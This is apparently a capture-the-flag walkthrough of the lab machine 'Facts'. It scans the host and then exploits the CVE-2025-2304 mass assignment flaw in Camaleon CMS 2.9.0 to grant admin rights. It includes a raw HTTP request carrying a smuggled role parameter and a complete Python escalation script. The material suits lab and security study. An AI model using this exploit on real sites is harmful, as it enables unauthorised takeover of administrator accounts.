Facts
Foothold
A TCP port scan with nmap shows only ports 22 and 80 open. From the information gathered we add a hosts entry mapping the IP to facts.htb. The version scan against port 80 identifies nginx 1.26.3 on Ubuntu:
sudo nmap -Pn -sV -p 80 --disable-arp-ping 10.129.2.129
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 11:38 +0100
Nmap scan report for facts.htb (10.129.2.129)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.26.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
Content discovery with ffuf turns up an admin.php login page.

Default credentials do not work, so we register an account and log in with it.

The version shown on the web page is Camaleon CMS 2.9.0, which is affected by CVE-2025-2304, a mass assignment vulnerability.
It lets any authenticated account promote itself to administrator. The updated_ajax action of Camaleon's UsersController (a Rails controller; Camaleon is a Ruby on Rails CMS) handles the password-change form with params.require(:password).permit!. permit! whitelists every key inside the password hash instead of only password and password_confirmation, so a PATCH to /admin/users/[id]/updated_ajax whose body also carries password[role]=admin gets that value assigned straight onto the user record.
The PoC is presented here
We therefore take the legitimate password-change request sent from /admin/profile/edit (Rails routes it as PATCH through the _method=patch override), set the password to test123 and append password[role]=admin to the body:
Request
POST /admin/users/5/updated_ajax HTTP/1.1
Host: facts.htb
Content-Length: 215
X-CSRF-Token: uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://facts.htb
Referer: http://facts.htb/admin/profile/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth_token=AsjI8c7Btp9M9GyHgbAsWw&Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36&10.10.14.185; _factsapp_session=Qz87P6ozb8TT3dlGH72X2o%2BNW%2FDhO%2Fy1pblbTFUvovYTx6IHCSgJ7rAFtA56%2FW5IZjZP7WdbUvFGXjbzENX2327UQ6gCdTU0zfErlJycxK8mtjapWY5Tj%2FTco4A6FPNzpgMxVd1V22vMAPPbIqWr7y1lV1fhAPD7F4SCRlr3LJRKqKBY7fBgyW4JsI83wY0jZYuc4S58Art5drmcFPv7GLnIokio8OzQb4fG2jEbZdskAx8EVC3vm7bks7%2BmkCJILeTds46pW6Xdc29EUjpA66M%2FtSlS%2BEkX1ebq0Rj%2FaYooLf5n6O6P6oPT27JUfhaFdtpknArq3ZphxYtH75u0vWIXJlt1g17MmvxUSWlFojRIo%2BHJBztpBypl%2FSK0Qoqurg%3D%3D--ASzpDvwEXqglF65U--1fCde4XKtMlMrbOihZz7lA%3D%3D
Connection: keep-alive
_method=patch&authenticity_token=uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg&password%5Bpassword%5D=test123&password%5Bpassword_confirmation%5D=test123&password[role]=admin
Response
HTTP/1.1 200 OK
Server: nginx/1.26.3 (Ubuntu)
Date: Sun, 22 Feb 2026 10:51:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-frame-options: SAMEORIGIN
x-xss-protection: 0
x-content-type-options: nosniff
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
vary: Accept
cache-control: no-cache
set-cookie: auth_token=V-fTeIkzuHtobNG_CTdSHw%26Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F144.0.0.0+Safari%2F537.36%2610.10.14.185; path=/; samesite=lax
set-cookie: _factsapp_session=tJF4oakEgaVPks4OcPH8Wk%2FIN5ofE5%2FheMS9N%2BhrSlYvJ12h7EBgRfPquCu3wrDszviBCJgJGJ7OFgurQofD%2BpWLgZdIPjguM2eQDgi3AAZevFaLxfA7KoUmQoTeXrz88mQiYcE0PrrGRk05Pip8fdnkDyRGfhtptFxB49RysEiuDt2Xlgycoui%2FdYPEkcJJMzd8Lf7QDqGl8FeuuD46Lyil5K%2FxYNb5K84DHDnJIsSB25He7P24Sit%2BjNbO17M2BwRUZGzijl623kePEs%2FztzqEXVpTlcAbqlUE8gxPCXYZG3NGn8fljgM%2FolmbkkFqMhPHYPRkpf4PcpS41hgae4ht9UlVOK1UeUcQwavpzbHbeDRKj7mEEkfi4PfKrPEdpA%3D%3D--J18Uc84bzVBns9FK--6YKxJZMD%2F3P8%2FAVyCs%2BLUw%3D%3D; path=/; httponly; samesite=lax
x-request-id: c667a4e3-73d5-49cf-8b80-904e01ebb055
x-runtime: 0.360213
The response is a bare 200 with an empty body, so success is not visible in the reply itself; the server does re-issue the auth_token cookie, whose value embeds the User-Agent string and our client IP (10.10.14.185) and, unlike _factsapp_session, is not flagged httponly. Reloading the admin panel afterwards shows functions that were not available to the plain account, confirming that the role change took effect.
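The request above turned into a small stand-alone script, as an added example (not the writeup author's tooling and not Camaleon's code). It assumes you pass the Cookie header of an already-registered, logged-in low-privilege session, that the CSRF token can be read from the csrf-token meta tag Rails renders on /admin/profile/edit, and that you know the numeric id of your own user (5 in the capture). The sample HTML embedded for the offline check is constructed, and the Chrome User-Agent is copied from the capture because the auth_token cookie embeds the UA string, so sending a different one risks the session being rejected.

```python
"""
CVE-2025-2304 privilege-escalation helper for Camaleon CMS 2.9.0.

Reproduces the captured request: a PATCH (via Rails' _method override) to
/admin/users/<id>/updated_ajax whose password[] hash smuggles role=admin past
params.require(:password).permit!. Assumptions: a Cookie header from a
logged-in session is supplied by the caller, and the CSRF token is read from
the <meta name="csrf-token"> tag that Rails' csrf_meta_tags renders.
"""
import re
import sys
import urllib.parse
import urllib.request
from urllib.error import HTTPError

# Same UA as the browser session: the auth_token cookie value embeds it.
BROWSER_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36")

# Constructed sample of csrf_meta_tags output, used only by the offline check.
SAMPLE_HTML = (
    '<head>\n'
    '<meta name="csrf-param" content="authenticity_token" />\n'
    '<meta name="csrf-token" content="uIClkglO0KxiujgWhP2cLDuTTSPKB95Tqp0NGZSrLjNorV6l1QlvA1mzkYiywCxXeCgKSCJvk5jhPzu_qkoxFg" />\n'
    '</head>'
)

CSRF_META = re.compile(r'<meta\s+name="csrf-token"\s+content="([^"]+)"')


def extract_csrf_token(html: str) -> str:
    """Pull the per-session CSRF token out of a logged-in admin page."""
    match = CSRF_META.search(html)
    if not match:
        raise ValueError("no csrf-token meta tag: the cookie is probably not a logged-in session")
    return match.group(1)


def build_payload(token: str, new_password: str, role: str = "admin") -> bytes:
    """Form body of the password-change request plus the smuggled role key."""
    fields = [
        ("_method", "patch"),                        # Rails method override: routed as PATCH
        ("authenticity_token", token),
        ("password[password]", new_password),
        ("password[password_confirmation]", new_password),
        ("password[role]", role),                    # not in the real form; permit! accepts it anyway
    ]
    return urllib.parse.urlencode(fields).encode()  # brackets are sent as %5B/%5D, Rails decodes them


def decode_payload(body: bytes) -> dict:
    """Inverse of build_payload: the parameter hash as the server will see it."""
    return {k: v[0] for k, v in urllib.parse.parse_qs(body.decode()).items()}


def escalate(base_url: str, user_id: int, cookie: str, new_password: str, role: str = "admin") -> dict:
    """Fetch a CSRF token, send the mass-assignment PATCH, return status and new cookies."""
    headers = {"Cookie": cookie, "User-Agent": BROWSER_UA}
    page = urllib.request.urlopen(urllib.request.Request(f"{base_url}/admin/profile/edit", headers=headers))
    token = extract_csrf_token(page.read().decode())

    req = urllib.request.Request(
        f"{base_url}/admin/users/{user_id}/updated_ajax",
        data=build_payload(token, new_password, role),
        method="POST",
        headers={
            **headers,
            "X-CSRF-Token": token,
            "X-Requested-With": "XMLHttpRequest",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Referer": f"{base_url}/admin/profile/edit",
        },
    )
    try:
        resp = urllib.request.urlopen(req)
    except HTTPError as err:   # 422 means a stale CSRF token or cookie; 401/302 means not logged in
        resp = err
    # Success looks like the capture: 200, Content-Length 0, fresh Set-Cookie headers.
    # Log back in as user_id with new_password and check for admin-only menu entries.
    return {"status": resp.code, "set_cookie": resp.headers.get_all("Set-Cookie") or []}


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} http://facts.htb <user_id> '<Cookie header>' <new_password>")
    result = escalate(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4])
    print(result["status"])
    for cookie_line in result["set_cookie"]:
        print(cookie_line)
```

Because the endpoint answers 200 with an empty body whether or not the role was actually changed, the script only reports the status and the re-issued cookies; the real confirmation is logging back in with the new password and seeing the administrator menu.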
